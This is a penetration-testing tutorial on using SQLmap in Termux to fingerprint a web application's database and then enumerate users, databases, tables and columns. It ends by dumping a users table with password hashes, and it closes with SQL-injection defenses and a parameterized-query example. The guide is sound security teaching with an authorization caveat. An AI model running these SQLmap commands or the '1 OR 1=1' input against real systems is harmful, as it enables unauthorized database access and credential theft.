Using SQLmap for Database Fingerprinting and Enumeration


Database fingerprinting is a vital step in ethical hacking and penetration testing. It helps identify the type and version of the database management system (DBMS) behind a web application. This information is crucial for tailoring further exploitation strategies, as vulnerabilities differ across MySQL, PostgreSQL, and other systems.

In this guide, we will walk through how to perform database fingerprinting and enumeration using SQLmap in Termux. With SQLmap, the process becomes highly efficient, allowing you to extract key information with minimal effort. By following these steps, you’ll learn to gather database details, enumerate tables and columns, and gain insights into the target system.




Prerequisites

To get started, ensure you have:


Step 1: Install SQLmap in Termux

First, update Termux and clone the SQLmap repository:

pkg update && pkg upgrade  
pkg install git  
git clone https://github.com/sqlmapproject/sqlmap.git  
cd sqlmap

Sample Output:

Cloning into 'sqlmap'...
remote: Enumerating objects: 45348, done.
remote: Counting objects: 100% (45348/45348), done.

Step 2: Perform Basic Database Fingerprinting

To begin fingerprinting, run the following SQLmap command to identify the DBMS type and version.

python sqlmap.py -u "http://target.com/page?id=1" --banner

Explanation:

  • -u: Specifies the target URL.
  • --banner: Extracts the database banner to determine the DBMS and version.

Sample Output:

[INFO] the back-end DBMS is MySQL
Banner: '5.7.32 MySQL Community Server'

Result: The output reveals that the backend database is MySQL version 5.7.32.


Step 3: Identify Database Users

After fingerprinting the DBMS, list the database users with this command:

python sqlmap.py -u "http://target.com/page?id=1" --users

Sample Output:

Database users:
[*] root@localhost
[*] admin@localhost
[*] guest@localhost

Why This Matters

Identifying users can reveal weak accounts or help in privilege escalation during penetration testing.


Step 4: Enumerate Databases

Use SQLmap to list the available databases on the server:

python sqlmap.py -u "http://target.com/page?id=1" --dbs

Explanation:

  • --dbs: Enumerates all available databases.

Sample Output:

available databases:
[*] information_schema
[*] example_db
[*] mysql

Step 5: Enumerate Tables in a Database

Once you’ve identified a target database, list its tables:

python sqlmap.py -u "http://target.com/page?id=1" -D example_db --tables

Explanation:

  • -D: Specifies the target database.
  • --tables: Lists all tables within the specified database.

Sample Output:

Database: example_db
[1] users
[2] orders
[3] products

Step 6: Enumerate Columns in a Table

Next, enumerate the columns within a specific table, such as users:

python sqlmap.py -u "http://target.com/page?id=1" -D example_db -T users --columns

Explanation:

  • -T: Specifies the target table.
  • --columns: Lists the columns in the selected table.

Sample Output:

Table: users
[1] id INT
[2] username VARCHAR(50)
[3] password VARCHAR(255)

Step 7: Extract Data with SQLmap

Now that you know the table structure, extract the data from the users table:

python sqlmap.py -u "http://target.com/page?id=1" -D example_db -T users --dump

Explanation:

  • --dump: Extracts all data from the specified table.

Sample Output:

id    username    password
1     admin       5f4dcc3b5aa765d61d8327deb882cf99
2     user1       6dcd4ce23d88e2ee9568ba546c007c63

Step 8: Automate Database Fingerprinting

For a comprehensive fingerprinting and enumeration process, use SQLmap’s --all option:

python sqlmap.py -u "http://target.com/page?id=1" --all

Explanation:

  • --all: Automates the extraction of all available information about the DBMS, users, databases, tables, and data.

Sample Output (Excerpt):

Database: example_db
Tables:
  - users
  - orders
Columns in 'users':
  - id
  - username
  - password
Data in 'users':
  - admin: 5f4dcc3b5aa765d61d8327deb882cf99

Step 9: Secure the Database

Understanding how attackers perform database fingerprinting highlights the need for robust security measures. To protect your applications:

  • Use parameterized queries to prevent SQL injection attacks.
  • Implement input validation to block malicious inputs.
  • Deploy a web application firewall (WAF) to monitor and block suspicious traffic.
  • Limit user privileges to minimize the impact of potential breaches.
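The first two measures in practice, on a table shaped like the users table from Step 6. This is an added example, not part of the original guide: it uses Python's built-in sqlite3 as a stand-in for the MySQL back end, and the function names, sample rows and tampered value are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the guide's example_db.users table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "hash-placeholder-1"), (2, "user1", "hash-placeholder-2")],
    )
    return db

def lookup_concat(db, raw_id):
    """Weak form: the request value becomes part of the SQL text."""
    sql = "SELECT id, username FROM users WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_param(db, raw_id):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    return db.execute(
        "SELECT id, username FROM users WHERE id = ?", (raw_id,)
    ).fetchall()

def validate_id(raw_id):
    """Input validation: accept only a short run of ASCII digits."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a positive integer")
    return int(raw_id)

def handle_request(db, raw_id):
    """Validation first, then a bound parameter: two independent layers."""
    try:
        return lookup_param(db, validate_id(raw_id))
    except ValueError:
        return []  # a real handler would answer 400 and log the rejected value

if __name__ == "__main__":
    db = make_db()
    tampered = "1 OR 1=1"  # constructed value that alters the query's logic
    print("concat: ", lookup_concat(db, tampered))   # every row comes back
    print("param:  ", lookup_param(db, tampered))    # no row matches
    print("handler:", handle_request(db, tampered))  # rejected before the query
    print("handler:", handle_request(db, "1"))       # normal lookup still works
```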

Conclusion

This guide covered how to use SQLmap for database fingerprinting and enumeration in Termux. SQLmap automates the process of identifying the DBMS, enumerating databases, tables, and columns, and extracting sensitive data. These techniques are essential for penetration testers, helping them understand system vulnerabilities and recommend mitigation strategies.

Always use these tools responsibly and ethically, ensuring you have proper authorization to perform testing on any web application.


